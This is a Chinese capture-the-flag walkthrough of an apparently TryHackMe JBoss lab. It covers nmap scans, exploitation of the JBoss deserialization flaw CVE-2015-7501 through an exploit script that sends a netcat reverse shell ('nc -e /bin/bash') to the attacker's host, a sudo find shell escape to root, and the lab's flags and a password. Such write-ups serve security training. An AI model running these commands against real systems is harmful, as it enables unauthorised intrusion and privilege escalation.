端口扫描

nmap --min-rate 10000 -p- 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:40 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.0056s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1090/tcp open ff-fms
1091/tcp open ff-sm
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3873/tcp open fagordnc
4446/tcp open n1-fwp
4712/tcp open unknown
4713/tcp open pulseaudio
5445/tcp open smbdirect
5455/tcp open apc-5455
5500/tcp open hotline
5501/tcp open fcp-addr-srvr2
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
MAC Address: 02:95:44:AE:CC:DF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.68 seconds
nmap -sT -sV -sC -O -p22,80,8009,8080 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:48 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.00054s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6978cb974d0f39efef3a5eaf8a9b57a (DSA)
| 2048 33a47b9138585030892de457bb07bb2f (RSA)
| 256 21018b37f51e2bc557f1b042b732abea (ECDSA)
|_ 256 f636073c3b3d7130c4cd2a1300b525ae (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Tony's Blog
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-title: Welcome to JBoss AS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
MAC Address: 02:95:44:AE:CC:DF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

Exploit

访问80端口

扫描目录得到 http://10.10.230.227/posts/frosted-flakes/ 有一张图片,下载下来strings发现字符串

THM{Tony_Sure_Loves_Frosted_Flakes}

访问8080的Jboss,访问 http://10.10.230.227:8080/jbossmq-httpil/HTTPServerLServlet

根据报错反馈能判断是6.X版本,根据房间提示是CVE-2015-7501

利用房间给的工具,用于构造反序列化链的ysoserial.jar和一个python的利用脚本,方便直接执行命令

python2 exploit.py 10.10.230.227:8080 'nc -e /bin/bash 10.11.77.28 1234'

记得使用jre才能运行

拿到了反弹shell

cd /home/jboss
cat .jboss.txt
THM{50c10ad46b5793704601ecdad865eb06}

提权

在note中找到jboss的密码

su jboss
Password: likeaboss
sudo find . -exec /bin/sh \; -quit

得到root.txt

QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y==

base64解码后

BC77AC072EE30E3760806864E234C7CF

在线md5解密得到:zxcvbnm123456789

碎碎念

最近都没打靶机,在研究javasec,不得不说Java真的难啊。重回thm,挑了一个简单的java靶场。